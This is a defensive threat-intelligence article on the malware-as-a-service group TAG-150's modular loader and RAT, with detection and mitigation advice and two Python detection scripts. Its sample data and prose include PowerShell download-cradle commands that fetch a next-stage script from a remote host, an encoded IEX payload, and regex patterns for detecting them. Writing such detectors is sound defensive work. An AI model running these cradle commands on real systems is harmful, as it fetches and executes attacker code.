MaaS Provider TAG-150 Distributes Modular Loader and RAT

Malware-as-a-Service Group TAG-150 Identified Operating Modular Loader and RAT Campaign

Severity: MEDIUM
November 29, 2025
Categories: Malware, Threat Actor

Related Entities

Threat Actors: TAG-150

Executive Summary

On November 29, 2025, security researchers published a report on an ongoing malware campaign orchestrated by a Malware-as-a-Service (MaaS) group identified as TAG-150. The group has been active since at least March 2025, providing its criminal clientele with a malware toolkit designed for information theft. The core components of their service are a modular loader and a Remote Access Trojan (RAT). The loader is responsible for the initial infection and can flexibly download different modules or the final RAT payload, which then gives the attacker control over the compromised system. This operation underscores the professionalization of cybercrime through the MaaS model, lowering the barrier to entry for less skilled actors.

Threat Overview

TAG-150 operates as a commercial enterprise on the dark web, selling or leasing its malware to other criminals. Their product is designed for stealth and flexibility. The campaign relies on user interaction for the initial infection, likely through phishing emails with malicious attachments or links. The malware itself uses living-off-the-land techniques to better blend in with normal system activity and evade detection by traditional security products. The ultimate goal of the campaign is not immediate disruption like ransomware, but long-term access for data theft, credential harvesting, and potentially selling that access to other threat actors.

Technical Analysis

The attack chain facilitated by TAG-150's MaaS offering follows a common pattern:

  1. Delivery: The initial loader is delivered via a social engineering vector, such as a malicious document attached to a phishing email (T1566.001 - Spearphishing Attachment).
  2. Execution: The user is tricked into opening the attachment (T1204.002 - Malicious File). Where the document carries a macro, the macro typically invokes built-in interpreters such as PowerShell (T1059.001) or Visual Basic (T1059.005) to run or fetch the loader; this is the living-off-the-land stage, since no new binary has to touch disk before the loader itself.
  3. Modular Loading: The loader connects to a C2 server and downloads additional modules or the final RAT payload (T1105 - Ingress Tool Transfer). Because modules are fetched on demand, the operator can tailor the tooling to the specific target environment.
  4. Command and Control: Once installed, the RAT communicates with the operator over its own C2 channel (T1071 - Application Layer Protocol), giving the attacker keylogging (T1056.001 - Keylogging), file system access (T1083 - File and Directory Discovery), and data exfiltration over the same channel (T1041 - Exfiltration Over C2 Channel). T1219 (Remote Access Software) describes abuse of legitimate remote-administration products rather than a purpose-built RAT, so the C2 and collection techniques above are the more accurate mapping.

Impact Assessment

  • Democratization of Cybercrime: The primary impact of MaaS providers like TAG-150 is that they lower the technical skill required to launch effective cyberattacks, leading to a greater volume of threats.
  • Information Theft: Victims of this campaign are at risk of having sensitive personal and financial information, login credentials, and proprietary business data stolen.
  • Gateway for Further Attacks: A system compromised by this RAT can be used as a foothold to launch more severe attacks, including ransomware deployment or as part of a botnet.

Detection & Response

  • Process Monitoring: Use EDR telemetry (or Sysmon Event ID 1 process-creation events) to alert on suspicious parent-child process chains, in particular Microsoft Office applications spawning cmd.exe, PowerShell, wscript.exe or other script hosts (D3FEND: Process Analysis / Process Spawn Analysis).
  • Network Monitoring: Analyze outbound traffic for C2 beaconing: periodic, low-volume connections to rare or newly registered domains and unfamiliar IP addresses (D3FEND: Network Traffic Analysis). A loader that checks in on a fixed schedule with a near-constant payload size stands out by regularity and rarity of destination rather than by volume; expect some jitter and tune thresholds accordingly.
  • File Hashing: Once file hashes for the loader and RAT components are published, sweep the environment for them to find existing infections (D3FEND: File Hashing). Treat hashes as a short-lived indicator for a MaaS product: each client build or repacked module yields a new hash, so the behavioral detections above should carry most of the weight.
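The beaconing heuristic from the Network Monitoring bullet, worked through as an added Python example; this is not code from the original article or from the referenced report. It parses constructed connection records (the log format `timestamp,src,dst,bytes_out`, the hosts, addresses, period and byte counts are all made up for illustration), groups them by source/destination pair, and flags pairs whose inter-connection intervals are nearly constant and whose payloads are small.

```python
"""Flag periodic, low-volume outbound connections (C2 beaconing) in connection logs.

Added illustration: the log format (timestamp,src,dst,bytes_out) and every value below
are constructed for this example, not taken from the TAG-150 report.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.0.0.5 beacons to 203.0.113.10 every ~60 s with ~400 bytes,
# and the same host browses 198.51.100.7 with irregular timing and sizes.
SAMPLE_LOG = """\
2025-11-29T10:00:00,10.0.0.5,203.0.113.10,412
2025-11-29T10:01:00,10.0.0.5,203.0.113.10,398
2025-11-29T10:02:01,10.0.0.5,203.0.113.10,405
2025-11-29T10:03:00,10.0.0.5,203.0.113.10,410
2025-11-29T10:04:01,10.0.0.5,203.0.113.10,401
2025-11-29T10:05:00,10.0.0.5,203.0.113.10,399
2025-11-29T10:00:13,10.0.0.5,198.51.100.7,51200
2025-11-29T10:00:47,10.0.0.5,198.51.100.7,2048
2025-11-29T10:02:35,10.0.0.5,198.51.100.7,183400
2025-11-29T10:04:10,10.0.0.5,198.51.100.7,9000
2025-11-29T10:04:12,10.0.0.5,198.51.100.7,700
2025-11-29T10:05:55,10.0.0.5,198.51.100.7,40000
"""


def parse_log(text):
    """Parse 'timestamp,src,dst,bytes_out' lines into (datetime, src, dst, int) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = line.split(",")
        rows.append((datetime.fromisoformat(ts), src, dst, int(nbytes)))
    return rows


def find_beacons(rows, min_conns=5, max_cv=0.15, max_median_bytes=2048):
    """Return {(src, dst): stats} for pairs whose connections are regular and small.

    cv is the coefficient of variation (population stdev / mean) of the intervals
    between consecutive connections: a jitter-free beacon sits near 0, while
    interactive browsing is typically well above 0.5.
    """
    flows = defaultdict(list)
    for ts, src, dst, nbytes in rows:
        flows[(src, dst)].append((ts, nbytes))
    hits = {}
    for key, conns in flows.items():
        if len(conns) < min_conns:
            continue
        conns.sort()
        intervals = [(b[0] - a[0]).total_seconds() for a, b in zip(conns, conns[1:])]
        mean = statistics.mean(intervals)
        if mean == 0:
            continue
        cv = statistics.pstdev(intervals) / mean
        median_bytes = statistics.median(nbytes for _, nbytes in conns)
        if cv <= max_cv and median_bytes <= max_median_bytes:
            hits[key] = {"count": len(conns), "period_s": round(mean, 1),
                         "cv": round(cv, 3), "median_bytes": median_bytes}
    return hits


if __name__ == "__main__":
    for (src, dst), stats in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"possible beacon {src} -> {dst}: {stats}")
```

On the constructed data only the 203.0.113.10 pair is reported (period 60 s, cv about 0.015). Real implants usually add jitter, which pushes cv into the 0.2 to 0.3 range, so raise `max_cv` deliberately and weight the verdict by how rare the destination is across the fleet rather than relying on regularity alone.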

Mitigation

  • Email Security: Deploy an email security gateway that detonates attachments in a sandbox and scans or rewrites links, to block the initial delivery vector.
  • User Training: Train users to be suspicious of unsolicited attachments and never to enable macros in documents from untrusted sources (M1017 - User Training).
  • Attack Surface Reduction: Enforce the Office policy that blocks macros in files downloaded from the internet (current Microsoft 365 Apps do this by default, but set it by policy so users cannot override the block) and enable the Microsoft Defender ASR rule "Block all Office applications from creating child processes". The rules that block Win32 API calls from Office macros and executable content created by Office add further coverage (M1040 - Behavior Prevention on Endpoint).
  • Application Control: Use executable allowlisting (for example Windows Defender Application Control or AppLocker) to prevent unknown loaders and RATs from executing on endpoints (M1038 - Execution Prevention). Allowlisting alone does not stop script stages that run through signed interpreters such as PowerShell, so pair it with script-host restrictions such as PowerShell Constrained Language Mode.

Timeline of Events

  1. March 2025: Earliest activity attributed to TAG-150's MaaS operation (the report dates it to at least March 2025).
  2. November 29, 2025: A threat intelligence report is published detailing the TAG-150 operation.
  3. November 29, 2025: This article was published.

MITRE ATT&CK Mitigations

  • M1017 - User Training: Train users to identify and report phishing emails, the primary delivery vector for this type of malware.
  • M1038 - Execution Prevention: Use application control to prevent the execution of unauthorized loaders and RATs.
  • M1049 - Antivirus/Antimalware: Deploy endpoint security solutions that use both signature-based and behavior-based detection to identify and block MaaS malware.

D3FEND Defensive Countermeasures

To combat threats from MaaS providers like TAG-150, which rely on loaders and living-off-the-land techniques, behavior-based process analysis is essential. Security teams should configure EDR tools with rules that detect anomalous parent-child process relationships (D3FEND: Process Spawn Analysis). For example, a rule should alert whenever a Microsoft Office application (such as winword.exe or excel.exe) spawns a command shell (cmd.exe), PowerShell, or a script host such as wscript.exe or mshta.exe; this is a classic indicator of a malicious macro executing. Bear in mind that a macro can launch its payload through WMI, in which case the child appears under WmiPrvSE.exe rather than the Office process, so the Office-to-shell rule should be complemented by alerts on WmiPrvSE.exe spawning interpreters. Further, monitoring PowerShell command lines for download cradles, for example IEX (New-Object Net.WebClient).DownloadString('http://...') or Invoke-WebRequest piped into Invoke-Expression, and for -EncodedCommand arguments (base64 of UTF-16LE text, which should be decoded and inspected), can detect the fileless retrieval of the next-stage payload, such as the RAT. Where the command line is obfuscated, PowerShell Script Block Logging (Event ID 4104) still records the decoded script.
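The two process-based detections described above (and in the Process Monitoring bullet of the Detection section), implemented as an added Python example that is not part of the original article or the referenced report. It runs over constructed Sysmon Event ID 1 style records (the paths, command lines, URL and the base64 blob are all made up for illustration): it flags Office applications spawning shells or script hosts, and for PowerShell children it inspects the command line for download cradles, decoding any -EncodedCommand argument from UTF-16LE base64 so that an encoded cradle is caught as well.

```python
"""Detect Office-to-shell spawns and PowerShell download cradles in process-creation events.

Added illustration: the events below are constructed in Sysmon Event ID 1 style and are
not taken from the TAG-150 report; hosts, paths, URL and encoded payload are made up.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Shells plus signed Windows binaries that malicious macros lean on ("living off the land").
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# Markers of a download-and-execute cradle in a command line or a decoded script.
CRADLE_PATTERNS = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
]
# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts abbreviated switches).
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/stage2.ps1')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo hello"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    # Constructed -enc argument: UTF-16LE base64 of "IEX (New-Object Net.WebClient)".
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return alert labels for one process-creation event (empty list if nothing suspicious)."""
    alerts = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        alerts.append(f"office_spawn:{parent}->{child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        cmdline = event["CommandLine"]
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            alerts.append("powershell_encoded")
        # Scan the raw command line and, when present, the decoded script as one haystack.
        haystack = cmdline + ("\n" + decoded if decoded else "")
        if any(p.search(haystack) for p in CRADLE_PATTERNS):
            alerts.append("powershell_cradle")
    return alerts


def scan(events):
    """Return [(index, alerts)] for every event that raised at least one alert."""
    results = []
    for i, event in enumerate(events):
        alerts = classify(event)
        if alerts:
            results.append((i, alerts))
    return results


if __name__ == "__main__":
    for i, alerts in scan(SAMPLE_EVENTS):
        print(i, alerts)
```

Events 0, 1 and 3 are reported; event 2, an administrator running a script from Explorer, is not. The Excel-to-cmd event fires on a harmless echo, which is intentional: the Office-to-shell rule is a high-signal alert that should be tuned with a short allowlist of known add-in behaviour rather than by inspecting the child's arguments.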

Sources & References

Cybersecurity Threat Research Feed – Latest Intelligence Updates
Securonix (securonix.com) November 29, 2025

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

maas, malware-as-a-service, rat, loader, tag-150, cybercrime
